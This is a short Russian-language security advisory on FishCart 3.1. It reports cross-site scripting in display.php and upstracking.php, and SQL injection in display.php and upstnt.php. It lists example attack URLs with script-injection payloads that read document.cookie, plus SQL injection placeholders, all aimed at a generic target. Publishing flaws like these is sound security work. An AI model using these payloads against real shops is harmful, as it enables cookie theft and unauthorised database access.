Программа: FishCart 3.1
Уязвимости позволяют удаленному
пользователю произвести XSS нападение и
выполнить произвольные SQL команды в базе
данных уязвимого приложения. Уязвимость
существует из-за недостаточной фильтрации
входных данных в параметре nlst сценария
display.php и параметры trackingnum, reqagree, и m сценария
upstracking.php. Удаленный пользователь может с
помощью специально сформированного URL
выполнить произвольный HTML сценарий в
браузере жертвы в контексте безопасности
уязвимого сайта.
Примеры:
http://[target]/demo31/display.php?cartid=200505024231092&zid=1 &lid=1&nlst='"><script>alert(document.cook
ie)</script>&
http://[target]/demo31/upstracking.php?trackingnum='"><script>alert(
document.cookie)</script>&reqagree=checked&m=
http://[target]/demo31/upstrack ing.php?trackingnum= & reqagree='"><script>alert(document.cookie)</script>&m=
http://[target]/demo31/upstracking.php?trackingnum= & reqagree=checked&m='"><script>alert(document.
cookie)</script>
SQL-инъекция существует из-за
недостаточной проверки входных данных в
нескольких сценариях. Удаленный
пользователь может выполнить произвольные
SQL команды в базе данных приложения.
Примеры:
http://[target]/demo31/display.php?cartid=200505024231092&zid=1 &lid=1&nlst=y&olimit=0&cat=&key1=&psku='SQL_INJECTION
http://[target]/demo31/upstnt.php?zid=1&lid=1& cartid='SQL_INJECTION